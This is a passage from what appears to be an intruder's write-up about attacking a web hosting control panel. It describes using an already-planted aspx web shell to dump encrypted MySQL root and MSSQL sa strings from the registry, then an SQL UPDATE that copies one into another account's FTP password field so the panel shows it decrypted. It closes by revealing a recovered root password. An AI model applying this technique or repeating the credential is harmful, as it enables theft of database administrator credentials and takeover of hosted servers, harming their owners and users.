shows them in plaintext, so the panel decrypts them on display. See where this is going? First dump the encrypted MySQL root / MSSQL sa strings from the registry through the aspx shell, then
overwrite some other account's password with that string using
UPDATE [hstlst] SET h_ftppss='aPWw3j4zMaK83lHMBof9fc298b1d3d0a' WHERE h_ID=10000471
Then go back and look at that account's password in the panel (it is now displayed in plaintext): the panel has become a decryption oracle for any blob encrypted with the same scheme.
Got the root password: sphil_070921. Note: because of various limitations my screenshots may not be perfect, but this method definitely works!